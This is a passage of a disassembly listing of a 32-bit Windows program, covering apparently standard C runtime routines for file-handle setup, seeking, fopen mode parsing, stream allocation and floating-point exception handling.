loc_42F6AE: ; CODE XREF: sub_42F523+12B�j
; sub_42F523+172�j
mov byte ptr [ebx], 0Ah
jmp short loc_42F6CB
; ---------------------------------------------------------------------------
loc_42F6B3: ; CODE XREF: sub_42F523+183�j
; sub_42F523+189�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_42F91D
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_42F6CC
loc_42F6C8: ; CODE XREF: sub_42F523+15C�j
; sub_42F523+162�j
mov byte ptr [ebx], 0Dh
loc_42F6CB: ; CODE XREF: sub_42F523+18E�j
inc ebx
loc_42F6CC: ; CODE XREF: sub_42F523+113�j
; sub_42F523+134�j ...
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_42F61F
jmp short loc_42F6EA
; ---------------------------------------------------------------------------
loc_42F6DA: ; CODE XREF: sub_42F523+103�j
mov eax, [edi]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_42F6EA
or al, 2
mov [esi], al
loc_42F6EA: ; CODE XREF: sub_42F523+F6�j
; sub_42F523+1B5�j ...
sub ebx, [ebp+arg_4]
mov [ebp+var_8], ebx
loc_42F6F0: ; CODE XREF: sub_42F523+CF�j
mov eax, [ebp+var_8]
jmp short loc_42F6F7
; ---------------------------------------------------------------------------
loc_42F6F5: ; CODE XREF: sub_42F523+16�j
; sub_42F523+43�j ...
xor eax, eax
loc_42F6F7: ; CODE XREF: sub_42F523+B8�j
; sub_42F523+1D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_42F523 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F6FC proc near ; CODE XREF: .text:0042C5F5�p
var_48 = byte ptr -48h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 48h
push ebx
push esi
push edi
push 480h
call sub_4297B8
mov esi, eax
pop ecx
test esi, esi
jnz short loc_42F71E
push 1Bh
call sub_42C67C
pop ecx
loc_42F71E: ; CODE XREF: sub_42F6FC+18�j
mov dword_676EE0, esi
mov dword_676FE0, 20h
lea eax, [esi+480h]
loc_42F734: ; CODE XREF: sub_42F6FC+58�j
cmp esi, eax
jnb short loc_42F756
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
and dword ptr [esi+8], 0
mov byte ptr [esi+5], 0Ah
mov eax, dword_676EE0
add esi, 24h
add eax, 480h
jmp short loc_42F734
; ---------------------------------------------------------------------------
loc_42F756: ; CODE XREF: sub_42F6FC+3A�j
lea eax, [ebp+var_48]
push eax
call dword_437238 ; GetStartupInfoA
cmp [ebp+var_16], 0
jz loc_42F83C
mov eax, [ebp+var_14]
test eax, eax
jz loc_42F83C
mov edi, [eax]
lea ebx, [eax+4]
lea eax, [ebx+edi]
mov [ebp+var_4], eax
mov eax, 800h
cmp edi, eax
jl short loc_42F78C
mov edi, eax
loc_42F78C: ; CODE XREF: sub_42F6FC+8C�j
cmp dword_676FE0, edi
jge short loc_42F7EA
mov esi, offset dword_676EE4
loc_42F799: ; CODE XREF: sub_42F6FC+E4�j
push 480h
call sub_4297B8
test eax, eax
pop ecx
jz short loc_42F7E4
add dword_676FE0, 20h
mov [esi], eax
lea ecx, [eax+480h]
loc_42F7B7: ; CODE XREF: sub_42F6FC+D9�j
cmp eax, ecx
jnb short loc_42F7D7
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov ecx, [esi]
add eax, 24h
add ecx, 480h
jmp short loc_42F7B7
; ---------------------------------------------------------------------------
loc_42F7D7: ; CODE XREF: sub_42F6FC+BD�j
add esi, 4
cmp dword_676FE0, edi
jl short loc_42F799
jmp short loc_42F7EA
; ---------------------------------------------------------------------------
loc_42F7E4: ; CODE XREF: sub_42F6FC+AA�j
mov edi, dword_676FE0
loc_42F7EA: ; CODE XREF: sub_42F6FC+96�j
; sub_42F6FC+E6�j
xor esi, esi
test edi, edi
jle short loc_42F83C
loc_42F7F0: ; CODE XREF: sub_42F6FC+13E�j
mov eax, [ebp+var_4]
mov ecx, [eax]
cmp ecx, 0FFFFFFFFh
jz short loc_42F832
mov al, [ebx]
test al, 1
jz short loc_42F832
test al, 8
jnz short loc_42F80F
push ecx
call dword_4371F4 ; GetFileType
test eax, eax
jz short loc_42F832
loc_42F80F: ; CODE XREF: sub_42F6FC+106�j
mov ecx, esi
mov eax, esi
sar ecx, 5
and eax, 1Fh
mov ecx, dword_676EE0[ecx*4]
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4]
mov ecx, [ebp+var_4]
mov ecx, [ecx]
mov [eax], ecx
mov cl, [ebx]
mov [eax+4], cl
loc_42F832: ; CODE XREF: sub_42F6FC+FC�j
; sub_42F6FC+102�j ...
add [ebp+var_4], 4
inc esi
inc ebx
cmp esi, edi
jl short loc_42F7F0
loc_42F83C: ; CODE XREF: sub_42F6FC+69�j
; sub_42F6FC+74�j ...
xor ebx, ebx
loc_42F83E: ; CODE XREF: sub_42F6FC+1A9�j
mov ecx, dword_676EE0
lea eax, [ebx+ebx*8]
cmp dword ptr [ecx+eax*4], 0FFFFFFFFh
lea esi, [ecx+eax*4]
jnz short loc_42F89D
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_42F85D
push 0FFFFFFF6h
pop eax
jmp short loc_42F867
; ---------------------------------------------------------------------------
loc_42F85D: ; CODE XREF: sub_42F6FC+15A�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_42F867: ; CODE XREF: sub_42F6FC+15F�j
push eax
call dword_437200 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_42F88C
push edi
call dword_4371F4 ; GetFileType
test eax, eax
jz short loc_42F88C
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_42F892
loc_42F88C: ; CODE XREF: sub_42F6FC+177�j
; sub_42F6FC+182�j
or byte ptr [esi+4], 40h
jmp short loc_42F8A1
; ---------------------------------------------------------------------------
loc_42F892: ; CODE XREF: sub_42F6FC+18E�j
cmp eax, 3
jnz short loc_42F8A1
or byte ptr [esi+4], 8
jmp short loc_42F8A1
; ---------------------------------------------------------------------------
loc_42F89D: ; CODE XREF: sub_42F6FC+152�j
or byte ptr [esi+4], 80h
loc_42F8A1: ; CODE XREF: sub_42F6FC+194�j
; sub_42F6FC+199�j ...
inc ebx
cmp ebx, 3
jl short loc_42F83E
push dword_676FE0
call dword_437204 ; SetHandleCount
pop edi
pop esi
pop ebx
leave
retn
sub_42F6FC endp
; =============== S U B R O U T I N E =======================================
sub_42F8B8 proc near ; CODE XREF: sub_42A2C1+20�p
; sub_42A2C1+EB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_676FE0
jnb short loc_42F905
mov ecx, esi
mov eax, esi
sar ecx, 5
and eax, 1Fh
mov ecx, dword_676EE0[ecx*4]
lea eax, [eax+eax*8]
test byte ptr [ecx+eax*4+4], 1
jz short loc_42F905
push edi
push esi
call sub_43241B
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push esi
call sub_42F91D
push esi
mov edi, eax
call sub_43247A
add esp, 14h
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_42F905: ; CODE XREF: sub_42F8B8+B�j
; sub_42F8B8+26�j
call sub_42F119
mov dword ptr [eax], 9
call sub_42F122
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
pop esi
retn
sub_42F8B8 endp
; =============== S U B R O U T I N E =======================================
sub_42F91D proc near ; CODE XREF: sub_42F523+197�p
; sub_42F8B8+38�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_4323D9
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_42F93C
call sub_42F119
mov dword ptr [eax], 9
jmp short loc_42F969
; ---------------------------------------------------------------------------
loc_42F93C: ; CODE XREF: sub_42F91D+10�j
push [esp+8+arg_8]
push 0
push [esp+10h+arg_4]
push eax
call dword_4370BC ; SetFilePointer
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_42F95C
call dword_437170 ; RtlGetLastWin32Error
jmp short loc_42F95E
; ---------------------------------------------------------------------------
loc_42F95C: ; CODE XREF: sub_42F91D+35�j
xor eax, eax
loc_42F95E: ; CODE XREF: sub_42F91D+3D�j
test eax, eax
jz short loc_42F96E
push eax
call sub_42F0A6
pop ecx
loc_42F969: ; CODE XREF: sub_42F91D+1D�j
or eax, 0FFFFFFFFh
jmp short loc_42F98D
; ---------------------------------------------------------------------------
loc_42F96E: ; CODE XREF: sub_42F91D+43�j
mov ecx, esi
and esi, 1Fh
sar ecx, 5
mov eax, esi
mov ecx, dword_676EE0[ecx*4]
lea eax, [eax+eax*8]
and byte ptr [ecx+eax*4+4], 0FDh
lea eax, [ecx+eax*4+4]
mov eax, edi
loc_42F98D: ; CODE XREF: sub_42F91D+4F�j
pop edi
pop esi
retn
sub_42F91D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F990 proc near ; CODE XREF: sub_42A4DB+1C�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, dword_676B34
push edi
mov edi, [ebp+arg_4]
xor ebx, ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov al, [edi]
cmp al, 61h
jz short loc_42F9C9
cmp al, 72h
jz short loc_42F9C2
cmp al, 77h
jnz loc_42FADD
mov ecx, 301h
jmp short loc_42F9CE
; ---------------------------------------------------------------------------
loc_42F9C2: ; CODE XREF: sub_42F990+21�j
xor ecx, ecx
or esi, 1
jmp short loc_42F9D1
; ---------------------------------------------------------------------------
loc_42F9C9: ; CODE XREF: sub_42F990+1D�j
mov ecx, 109h
loc_42F9CE: ; CODE XREF: sub_42F990+30�j
or esi, 2
loc_42F9D1: ; CODE XREF: sub_42F990+37�j
push 1
pop edx
loc_42F9D4: ; CODE XREF: sub_42F990+8B�j
; sub_42F990+A0�j ...
mov al, [edi+1]
inc edi
cmp al, bl
jz loc_42FAC3
cmp edx, ebx
jz loc_42FAC3
movsx eax, al
cmp eax, 54h
jg short loc_42FA62
jz short loc_42FA52
sub eax, 2Bh
jz short loc_42FA3C
sub eax, 19h
jz short loc_42FA32
sub eax, 0Eh
jz short loc_42FA1D
dec eax
jnz loc_42FAB4
cmp [ebp+var_4], ebx
jnz loc_42FAB4
mov [ebp+var_4], 1
or ecx, 20h
jmp short loc_42F9D4
; ---------------------------------------------------------------------------
loc_42FA1D: ; CODE XREF: sub_42F990+6F�j
cmp [ebp+var_4], ebx
jnz loc_42FAB4
mov [ebp+var_4], 1
or ecx, 10h
jmp short loc_42F9D4
; ---------------------------------------------------------------------------
loc_42FA32: ; CODE XREF: sub_42F990+6A�j
test cl, 40h
jnz short loc_42FAB4
or ecx, 40h
jmp short loc_42F9D4
; ---------------------------------------------------------------------------
loc_42FA3C: ; CODE XREF: sub_42F990+65�j
test cl, 2
jnz short loc_42FAB4
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_42F9D4
; ---------------------------------------------------------------------------
loc_42FA52: ; CODE XREF: sub_42F990+60�j
mov eax, 1000h
test ecx, eax
jnz short loc_42FAB4
or ecx, eax
jmp loc_42F9D4
; ---------------------------------------------------------------------------
loc_42FA62: ; CODE XREF: sub_42F990+5E�j
sub eax, 62h
jz short loc_42FAAF
dec eax
jz short loc_42FA98
sub eax, 0Bh
jz short loc_42FA81
sub eax, 6
jnz short loc_42FAB4
test ch, 0C0h
jnz short loc_42FAB4
or ch, 40h
jmp loc_42F9D4
; ---------------------------------------------------------------------------
loc_42FA81: ; CODE XREF: sub_42F990+DD�j
cmp [ebp+var_8], ebx
jnz short loc_42FAB4
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp loc_42F9D4
; ---------------------------------------------------------------------------
loc_42FA98: ; CODE XREF: sub_42F990+D8�j
cmp [ebp+var_8], ebx
jnz short loc_42FAB4
mov [ebp+var_8], 1
or esi, 4000h
jmp loc_42F9D4
; ---------------------------------------------------------------------------
loc_42FAAF: ; CODE XREF: sub_42F990+D5�j
test ch, 0C0h
jz short loc_42FABB
loc_42FAB4: ; CODE XREF: sub_42F990+72�j
; sub_42F990+7B�j ...
xor edx, edx
jmp loc_42F9D4
; ---------------------------------------------------------------------------
loc_42FABB: ; CODE XREF: sub_42F990+122�j
or ch, 80h
jmp loc_42F9D4
; ---------------------------------------------------------------------------
loc_42FAC3: ; CODE XREF: sub_42F990+4A�j
; sub_42F990+52�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_4336B9
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_42FAE1
loc_42FADD: ; CODE XREF: sub_42F990+25�j
xor eax, eax
jmp short loc_42FAFB
; ---------------------------------------------------------------------------
loc_42FAE1: ; CODE XREF: sub_42F990+14B�j
mov eax, [ebp+arg_C]
inc dword_676920
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_42FAFB: ; CODE XREF: sub_42F990+14F�j
pop edi
pop esi
pop ebx
leave
retn
sub_42F990 endp
; =============== S U B R O U T I N E =======================================
sub_42FB00 proc near ; CODE XREF: sub_42A4DB+1�p
push ebx
push esi
push edi
push 2
xor ebx, ebx
xor edi, edi
call sub_42DAEF
xor esi, esi
cmp dword_678020, ebx
pop ecx
jle loc_42FBBA
loc_42FB1D: ; CODE XREF: sub_42FB00+57�j
mov eax, dword_67700C
mov eax, [eax+esi*4]
cmp eax, ebx
jz short loc_42FB60
test byte ptr [eax+0Ch], 83h
jnz short loc_42FB50
push eax
push esi
call sub_42C203
pop ecx
pop ecx
mov ecx, dword_67700C
mov eax, [ecx+esi*4]
test byte ptr [eax+0Ch], 83h
jz short loc_42FB5B
push eax
push esi
call sub_42C255
pop ecx
pop ecx
loc_42FB50: ; CODE XREF: sub_42FB00+2D�j
inc esi
cmp esi, dword_678020
jl short loc_42FB1D
jmp short loc_42FBBA
; ---------------------------------------------------------------------------
loc_42FB5B: ; CODE XREF: sub_42FB00+45�j
mov edi, [ecx+esi*4]
jmp short loc_42FBA4
; ---------------------------------------------------------------------------
loc_42FB60: ; CODE XREF: sub_42FB00+27�j
push 38h
shl esi, 2
call sub_4297B8
pop ecx
mov ecx, dword_67700C
mov [esi+ecx], eax
mov eax, dword_67700C
mov eax, [esi+eax]
cmp eax, ebx
jz short loc_42FBBA
add eax, 20h
push eax
call dword_437158 ; InitializeCriticalSection
mov eax, dword_67700C
mov eax, [esi+eax]
add eax, 20h
push eax
call dword_4370CC ; RtlEnterCriticalSection
mov eax, dword_67700C
mov edi, [esi+eax]
loc_42FBA4: ; CODE XREF: sub_42FB00+5E�j
cmp edi, ebx
jz short loc_42FBBA
or dword ptr [edi+10h], 0FFFFFFFFh
mov [edi+4], ebx
mov [edi+0Ch], ebx
mov [edi+8], ebx
mov [edi], ebx
mov [edi+1Ch], ebx
loc_42FBBA: ; CODE XREF: sub_42FB00+17�j
; sub_42FB00+59�j ...
push 2
call sub_42DB50
pop ecx
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_42FB00 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42FBC8(int, double, int)
sub_42FBC8 proc near ; CODE XREF: sub_42A706+51�p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = qword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp dword_453B20, 0
jnz short loc_42FBFD
push [ebp+arg_C] ; int
fld [ebp+arg_4]
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
push ecx ; int
push ecx ; int
fldz
fstp [esp+14h+var_14]
fld [ebp+arg_4]
push ecx ; int
push ecx ; int
fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_43017E
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42FBFD: ; CODE XREF: sub_42FBC8+A�j
call sub_42F119
push 0FFFFh
mov dword ptr [eax], 21h
push [ebp+arg_C]
call sub_4303F3
fld [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_42FBC8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42FC1C(int, int, double, double, int)
sub_42FC1C proc near ; CODE XREF: sub_42A706:loc_42A7C9�p
var_74 = qword ptr -74h
var_6C = qword ptr -6Ch
var_64 = qword ptr -64h
var_5C = dword ptr -5Ch
var_58 = byte ptr -58h
var_20 = dword ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = qword ptr 10h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 58h
push [ebp+arg_18]
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_0]
call sub_42FF67
add esp, 0Ch
test eax, eax
jnz short loc_42FC5A
lea eax, [ebp+arg_10]
and [ebp+var_20], 0FFFFFFFEh
push eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+arg_18]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_58]
push eax
call sub_42FCB4
add esp, 18h
loc_42FC5A: ; CODE XREF: sub_42FC1C+1A�j
push [ebp+arg_0]
call sub_430253
cmp dword_453B20, 0
pop ecx
jnz short loc_42FC98
test eax, eax
jz short loc_42FC98
push [ebp+arg_18] ; int
fld [ebp+arg_10]
push ecx
push ecx ; double
fstp [esp+64h+var_64]
push ecx ; int
push ecx ; int
fldz
fstp [esp+6Ch+var_6C]
fld [ebp+arg_8]
push ecx ; int
push ecx ; int
fstp [esp+74h+var_74]
push [ebp+arg_4] ; int
push eax ; int
call sub_43017E
add esp, 24h
leave
retn
; ---------------------------------------------------------------------------
loc_42FC98: ; CODE XREF: sub_42FC1C+4E�j
; sub_42FC1C+52�j
push eax
call sub_430206
mov [esp+5Ch+var_5C], 0FFFFh
push [ebp+arg_18]
call sub_4303F3
fld [ebp+arg_10]
pop ecx
pop ecx
leave
retn
sub_42FC1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42FCB4 proc near ; CODE XREF: sub_42FC1C+36�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
xor eax, eax
push ebx
push esi
mov [ecx+4], eax
mov ecx, [ebp+arg_0]
push edi
push 1
mov [ecx+8], eax
mov ecx, [ebp+arg_0]
pop ebx
mov [ecx+0Ch], eax
mov cl, byte ptr [ebp+arg_8]
test cl, 10h
jz short loc_42FCE6
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Fh
or [eax+4], ebx
loc_42FCE6: ; CODE XREF: sub_42FCB4+23�j
test cl, 2
jz short loc_42FCF9
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000093h
or dword ptr [eax+4], 2
loc_42FCF9: ; CODE XREF: sub_42FCB4+35�j
test cl, bl
jz short loc_42FD0B
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000091h
or dword ptr [eax+4], 4
loc_42FD0B: ; CODE XREF: sub_42FCB4+47�j
test cl, 4
jz short loc_42FD1E
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C000008Eh
or dword ptr [eax+4], 8
loc_42FD1E: ; CODE XREF: sub_42FCB4+5A�j
test cl, 8
jz short loc_42FD31
mov eax, [ebp+arg_0]
mov [ebp+arg_8], 0C0000090h
or dword ptr [eax+4], 10h
loc_42FD31: ; CODE XREF: sub_42FCB4+6D�j
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
push 2
mov ecx, [esi]
mov edx, [eax+8]
not ecx
and ecx, ebx
and edx, 0FFFFFFEFh
shl ecx, 4
or ecx, edx
pop edi
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
and ecx, 4
shl ecx, 1
and edx, 0FFFFFFF7h
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 1
and ecx, 4
and edx, 0FFFFFFFBh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 3
and ecx, edi
and edx, 0FFFFFFFDh
or ecx, edx
mov [eax+8], ecx
mov ecx, [esi]
mov eax, [ebp+arg_0]
not ecx
mov edx, [eax+8]
shr ecx, 5
and ecx, ebx
and edx, 0FFFFFFFEh
or ecx, edx
mov [eax+8], ecx
call sub_4303D6
test al, bl
jz short loc_42FDBA
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 10h
loc_42FDBA: ; CODE XREF: sub_42FCB4+FD�j
test al, 4
jz short loc_42FDC5
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 8
loc_42FDC5: ; CODE XREF: sub_42FCB4+108�j
test al, 8
jz short loc_42FDD0
mov ecx, [ebp+arg_0]
or dword ptr [ecx+0Ch], 4
loc_42FDD0: ; CODE XREF: sub_42FCB4+113�j
test al, 10h
jz short loc_42FDDA
mov ecx, [ebp+arg_0]
or [ecx+0Ch], edi
loc_42FDDA: ; CODE XREF: sub_42FCB4+11E�j
test al, 20h
jz short loc_42FDE4
mov eax, [ebp+arg_0]
or [eax+0Ch], ebx
loc_42FDE4: ; CODE XREF: sub_42FCB4+128�j
mov eax, [esi]
mov ecx, 0C00h
and eax, ecx
jz short loc_42FE23
cmp eax, 400h
jz short loc_42FE15
cmp eax, 800h
jz short loc_42FE09
cmp eax, ecx
jnz short loc_42FE29
mov eax, [ebp+arg_0]
or dword ptr [eax], 3
jmp short loc_42FE29
; ---------------------------------------------------------------------------
loc_42FE09: ; CODE XREF: sub_42FCB4+147�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFEh
or ecx, edi
jmp short loc_42FE1F
; ---------------------------------------------------------------------------
loc_42FE15: ; CODE XREF: sub_42FCB4+140�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFFDh
or ecx, ebx
loc_42FE1F: ; CODE XREF: sub_42FCB4+15F�j
mov [eax], ecx
jmp short loc_42FE29
; ---------------------------------------------------------------------------
loc_42FE23: ; CODE XREF: sub_42FCB4+139�j
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFFCh
loc_42FE29: ; CODE XREF: sub_42FCB4+14B�j
; sub_42FCB4+153�j ...
mov eax, [esi]
mov ecx, 300h
and eax, ecx
jz short loc_42FE54
cmp eax, 200h
jz short loc_42FE47
cmp eax, ecx
jnz short loc_42FE61
mov eax, [ebp+arg_0]
and dword ptr [eax], 0FFFFFFE3h
jmp short loc_42FE61
; ---------------------------------------------------------------------------
loc_42FE47: ; CODE XREF: sub_42FCB4+185�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFE7h
or ecx, 4
jmp short loc_42FE5F
; ---------------------------------------------------------------------------
loc_42FE54: ; CODE XREF: sub_42FCB4+17E�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 0FFFFFFEBh
or ecx, 8
loc_42FE5F: ; CODE XREF: sub_42FCB4+19E�j
mov [eax], ecx
loc_42FE61: ; CODE XREF: sub_42FCB4+189�j
; sub_42FCB4+191�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_C]
and ecx, 0FFFh
mov edx, [eax]
shl ecx, 5
and edx, 0FFFE001Fh
or ecx, edx
mov [eax], ecx
mov eax, [ebp+arg_0]
or [eax+20h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov [eax+20h], ecx
mov eax, [ebp+arg_10]
fld qword ptr [eax]
mov eax, [ebp+arg_0]
fstp qword ptr [eax+10h]
mov eax, [ebp+arg_0]
or [eax+50h], ebx
mov eax, [ebp+arg_0]
mov ecx, [eax+50h]
and ecx, 0FFFFFFE3h
or ecx, edi
mov edi, [ebp+arg_14]
mov [eax+50h], ecx
mov eax, [ebp+arg_0]
fld qword ptr [edi]
fstp qword ptr [eax+40h]
call sub_4303E4
lea eax, [ebp+arg_0]
push eax
push ebx
push 0
push [ebp+arg_8]
call dword_437234 ; RaiseException
mov eax, [ebp+arg_0]
test byte ptr [eax+8], 10h
jz short loc_42FEDB
and dword ptr [esi], 0FFFFFFFEh
loc_42FEDB: ; CODE XREF: sub_42FCB4+222�j
test byte ptr [eax+8], 8
jz short loc_42FEE4
and dword ptr [esi], 0FFFFFFFBh
loc_42FEE4: ; CODE XREF: sub_42FCB4+22B�j
test byte ptr [eax+8], 4
jz short loc_42FEED
and dword ptr [esi], 0FFFFFFF7h
loc_42FEED: ; CODE XREF: sub_42FCB4+234�j
test byte ptr [eax+8], 2
jz short loc_42FEF6
and dword ptr [esi], 0FFFFFFEFh
loc_42FEF6: ; CODE XREF: sub_42FCB4+23D�j
test [eax+8], bl
jz short loc_42FEFE
and dword ptr [esi], 0FFFFFFDFh
loc_42FEFE: ; CODE XREF: sub_42FCB4+245�j
mov ecx, [eax]
mov edx, 0FFFFF3FFh
and ecx, 3
sub ecx, 0
jz short loc_42FF32
dec ecx
jz short loc_42FF26
dec ecx
jz short loc_42FF1C
dec ecx
jnz short loc_42FF34
or byte ptr [esi+1], 0Ch
jmp short loc_42FF34
; ---------------------------------------------------------------------------
loc_42FF1C: ; CODE XREF: sub_42FCB4+25D�j
mov ecx, [esi]
and ch, 0FBh
or ch, 8
jmp short loc_42FF2E
; ---------------------------------------------------------------------------
loc_42FF26: ; CODE XREF: sub_42FCB4+25A�j
mov ecx, [esi]
and ch, 0F7h
or ch, 4
loc_42FF2E: ; CODE XREF: sub_42FCB4+270�j
mov [esi], ecx
jmp short loc_42FF34
; ---------------------------------------------------------------------------
loc_42FF32: ; CODE XREF: sub_42FCB4+257�j
and [esi], edx
loc_42FF34: ; CODE XREF: sub_42FCB4+260�j
; sub_42FCB4+266�j ...
mov ecx, [eax]
shr ecx, 2
and ecx, 7
sub ecx, 0
jz short loc_42FF54
dec ecx
jz short loc_42FF4B
dec ecx
jnz short loc_42FF5D
and [esi], edx
jmp short loc_42FF5D
; ---------------------------------------------------------------------------
loc_42FF4B: ; CODE XREF: sub_42FCB4+28E�j
mov ecx, [esi]
and ecx, edx
or ch, 2
jmp short loc_42FF5B
; ---------------------------------------------------------------------------
loc_42FF54: ; CODE XREF: sub_42FCB4+28B�j
mov ecx, [esi]
and ecx, edx
or ch, 3
loc_42FF5B: ; CODE XREF: sub_42FCB4+29E�j
mov [esi], ecx
loc_42FF5D: ; CODE XREF: sub_42FCB4+291�j
; sub_42FCB4+295�j
fld qword ptr [eax+40h]
fstp qword ptr [edi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_42FCB4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42FF67 proc near ; CODE XREF: sub_42FC1C+10�p
var_24 = qword ptr -24h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push ebx
push edi
mov edi, eax
and edi, 1Fh
push 1
test al, 8
pop ebx
jz short loc_42FF92
test byte ptr [ebp+arg_8], bl
jz short loc_42FF92
push ebx
call sub_430416
pop ecx
and edi, 0FFFFFFF7h
jmp loc_43015C
; ---------------------------------------------------------------------------
loc_42FF92: ; CODE XREF: sub_42FF67+15�j
; sub_42FF67+1A�j
test al, 4
jz short loc_42FFAC
test byte ptr [ebp+arg_8], 4
jz short loc_42FFAC
push 4
call sub_430416
pop ecx
and edi, 0FFFFFFFBh
jmp loc_43015C
; ---------------------------------------------------------------------------
loc_42FFAC: ; CODE XREF: sub_42FF67+2D�j
; sub_42FF67+33�j
test al, bl
jz loc_430086
test byte ptr [ebp+arg_8], 8
jz loc_430086
push 8
call sub_430416
pop ecx
mov eax, 0C00h
mov ecx, [ebp+arg_8]
and ecx, eax
jz loc_43005E
cmp ecx, 400h
jz short loc_430036
cmp ecx, 800h
jz short loc_43000E
cmp ecx, eax
jnz loc_43007E
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_437628
fld dbl_4536E0
fnstsw ax
sahf
ja short loc_430006
fchs
loc_430006: ; CODE XREF: sub_42FF67+9B�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_43007C
; ---------------------------------------------------------------------------
loc_43000E: ; CODE XREF: sub_42FF67+7D�j
mov ecx, [ebp+arg_4]
fld qword ptr [ecx]
fcomp dbl_437628
fnstsw ax
sahf
jbe short loc_430026
fld dbl_4536D0
jmp short loc_43002E
; ---------------------------------------------------------------------------
loc_430026: ; CODE XREF: sub_42FF67+B5�j
fld dbl_4536E0
fchs
loc_43002E: ; CODE XREF: sub_42FF67+BD�j
fstp [ebp+var_C]
fld [ebp+var_C]
jmp short loc_43007C
